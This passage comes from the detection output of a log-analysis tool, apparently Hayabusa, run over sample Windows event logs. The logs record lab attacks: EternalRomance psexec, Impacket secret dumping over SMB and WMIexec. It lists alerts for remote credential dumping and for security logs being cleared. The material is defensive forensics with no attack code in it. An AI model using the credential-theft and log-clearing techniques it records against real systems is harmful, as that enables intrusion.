admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 
17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 
10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : 
IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 
+2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 
0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 
+09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 
